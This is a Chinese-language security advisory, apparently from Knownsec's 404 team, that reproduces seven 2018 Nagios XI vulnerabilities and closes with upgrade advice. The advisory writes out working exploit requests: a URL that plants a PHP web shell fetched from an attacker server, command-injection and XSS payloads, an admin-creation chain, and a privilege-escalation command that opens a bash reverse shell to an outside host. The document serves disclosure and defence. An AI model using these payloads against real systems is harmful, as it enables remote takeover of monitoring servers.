一、漏洞概述
1 简介
Nagios 是一款开源的免费网络监视工具,能有效监控 Windows、Linux 和 Unix 的主机状态,交换机路由器等网络设备,打印机等。在系统或服务状态异常时发出邮件或短 信报警第一时间通知网站运维人员,在状态恢复后发出正常的邮件或短信通知。
2018 年 11 月 13 日,Tenable 团队在其网站上公布了 Nagios XI 多个高危漏洞,其 中包含未授权远程命令执行漏洞,认证命令执行漏洞,提权漏洞,存储型 XSS,反射型 XSS 等多个漏洞。
2018 年 12 月 3 日,Seebug 平台收录了该些漏洞,知道创宇 404 漏洞应急团队开 始对该漏洞进行漏洞应急。
2 影响版本
⚫ Nagios XI < 5.5.7
二、漏洞复现
1 复现环境
⚫ Nagios XI 5.5.6
2 复现过程及结果
2.1 未授权远程命令执行漏洞(CVE-2018-15708)
1. 启动恶意 HTTPS 服务器,访问该服务器会返回恶意 PHP 代码。
2. 访问链接,请求恶意 HTTPS 服务器。 http://192.168.177.128/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scrip ts/magpie_debug.php?url=https://192.168.177.1:4443/%20-o%20/usr/local/na gvis/share/exec.php
可以看到,shell 已经成功的写入到服务器中。
3. 访问 shell。
2.2 Cmdsubsys.php(需认证)命令执行漏洞 (CVE-2018-15709)
1. 登陆后台,查看源码,找出 nsp 值。
2. 访问链接,执行 whoami 命令,将结果写入
/usr/local/nagiosxi/html/whoami.txt
http://192.168.177.128/nagiosxi/ajaxhelper.php?cmd=submitcommand&o
pts={%22cmd%22:1100,%22cmddata%22:{%22username%22:%22nagiosad
min%22,%22password%22:%22admin%27;id%20%3E%20/usr/local/nagvis/
share/id.txt;%27%22},%22cmdtime%22:0,%22cmdargs%22:%22%22}&nsp=
28686281bbebe5fc8ae2cfead993e697ff2cb6c9599f246568a3df2cf2720e55
3. 获取命令执行结果。
2.3 Autodiscover_new.php 提权漏洞(CVE-2018-15710)
1、为了演示,首先将权限降为 nagios 权限。
2、在外部监听 4444 端口,通过 autodiscover_new.php 文件进行提权。
sudo php /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodisc over_new.php --addresses ='127.0.0.1/0; /bin/bash -i>& /dev/tcp/192.168.177.1/4444 0>&1;'
3. 可以看到,4444 端口返连回来的 shell,权限是 root 权限。
2.4 未授权 API KEY 再生漏洞(CVE-2018-15711) 低权限,经过身份验证的用户可以强制任何 Nagios XI 用户(包括管理员)重新生成 API KEY。 重新生成 API KEY 时,将在响应正文中返回一个新 KEY。 这使恶意用户能 够以更高级别的权限执行后续 API 调用。 例如,可以创建新的管理员用户。
1、添加一个普通用户 test,记录 nsp 的值。
2、重新生成管理员 API KEY。
http://192.168.177.128/nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts={% 22func%22:%22set_random_api_key%22,%22args%22:{%22user_id%22:1}}&ns p=e7ca0008dfc34a1f46daaafdde772970265a43f3460317b3b9aa2558ff5b4eb9
3. 使用第二步生成的 KEY,调用 API,添加一个管理员 test_admin。
http://192.168.177.128//nagiosxi/api/v1/add_user&apikey=RLLhPXVJv5Wk7n WHgIK0UoWJgKg2q76BR7RXl3WT7StdfqTv8UPiiL2SMhTsnf3v&username=tes t_admin&password=test_admin&email=test_admin@doo.com&name=test_a dmin+do&auth_level=admin&api_enabled=1&force_pw_change=0&can_see_
all_hs=1&can_control_all_hs=1&can_reconfigure_hs=1&can_control_engine=1 &can_use_advanced=1
4. 使用 test_admin 登陆,可以看到 test_admin 权限为管理员。
2.5 Api_tool.php 未授权存储型 XSS(CVE-2018-15712)
1. 配置 BPI(不用权限)。 http://192.168.177.128/nagiosxi/includes/components/nagiosbpi/api_tool.php ?cmd=syncall
2. 添加成员,会触发一个反射性 XSS。
http://192.168.177.128/nagiosxi/includes/components/nagiosbpi/api_tool.php ?cmd=addmember&group=linux-servers&host=hello%0a}%0adefine%20%3C
script%3Ealert(1)%3C/script%3E%20{%0adesc=%3C/strong%3E%3Cscript%3E alert(2)%3C/script%3E
3. 其他有权限用户查看 BPI 配置时,同样会触发 XSS payload。
2.6 Users.php(需认证) 存储型 XSS(CVE-2018-15713)
1. 在编辑用户属性时候,将 payload 插入到 Email 框中。
2. 再次查看该页面时会触发 XSS payload。
2.7 Checkauth.php(需认证) 反射型 XSS(CVE-2018-15714) 登陆后,访问
http://192.168.177.128/nagiosxi/account/checkauth.php?oname=" autofocus onfocus="javascript:alert(nsp_str)
三、漏洞影响
根据 ZoomEye 网络空间搜索引擎对 Nagios XI 服务的搜索结果,共找到 4258 条历史记录。
四、防护方案
1、Nagios 官方已经发布 5.5.7 版本修复这些漏洞,建议受影响的用户尽快升级更新 进行防护。
2、使用第三方防火墙进行防护(如创宇盾[https://www.yunaq.com/cyd/]) 3、技术业务咨询
知道创宇技术业务咨询热线 : 400-060-9587(政府,国有企业)、028-68360638(互联网企业)
五、相关链接
[1] Nagios 官网 https://www.nagios.com/
[2] Tenable 漏洞详情 https://www.tenable.com/security/research/tra-2018-37
[3] Seebug 收录 https://www.seebug.org/vuldb/ssvid-97699
[4] ZoomEye 网络空间搜索引擎 https://www.zoomeye.org/searchResult?q=nagiosxi
2020年09月17日,IBM发布安全公告,WebSphere Application Server中存在一个安全漏洞,该漏洞是由于WebSphere Application Server在处理XML数据时容易受到XML外部实体注入(XXE)攻击。
2020年9月22日,FastAdmin远程代码执行漏洞细节曝光,黑客登录前台会员中心,即可远程GetShell,风险极大。
2020年9月17日,VMware发布安全公告,在Spring Framework版本5.2.0-5.2.8、5.1.0-5.1.17、5.0.0-5.0.18、4.3.0-4.3.28和较旧的不受支持的版本中,发现了一个存在于Spring Framework中的反射型文件下载(Reflected File Download,RFD)漏洞(CVE-2020-5421)。
获取安全动态